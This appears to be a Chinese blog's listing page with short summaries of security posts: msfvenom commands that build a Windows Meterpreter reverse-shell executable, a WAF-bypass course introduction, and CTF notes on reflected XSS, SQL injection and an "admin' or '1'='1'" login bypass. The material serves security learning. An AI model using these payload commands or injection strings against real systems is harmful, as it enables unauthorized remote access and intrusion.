摘要：Meterpreter Shell: msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=8080 -f exe > reverse.exe msfvenom -p windows/shell_reverse_tcp L 阅读全文

摘要：WAF是如何被绕过的 课程简介 WAF(Web应用防火墙，Web Application Firewall的简称)是通过执行一系列针对HTTP/HTTPS的安全策略来专门为Web应用提供保护的产品。WAF可以发现和拦截各类Web层面的攻击，记录攻击日志，实时预警提醒，在Web应用本身存在缺陷的情况下 阅读全文

摘要：title: 记录对permate漏洞挖掘 categories: ctf 1.反射型xss 搜索框尝试xss语句，发现存在反射型xss 2.SQL注入 存在sql注入 --+注释，发现存在11个字段 http://10.196.8.31/home/index.php?m=tiezi&a=index 阅读全文

摘要：title: 记录对Piti's wonderful blog漏洞挖掘 categories: ctf 1.首页发现收索框，尝试xss，发现存在反射型xss漏洞 2.首页发现一个登陆框，发现万能用户登陆 admin’ or ‘1’=’1’ 3.用户登陆后看到写文章版，尝试存储型xss,过滤<scri 阅读全文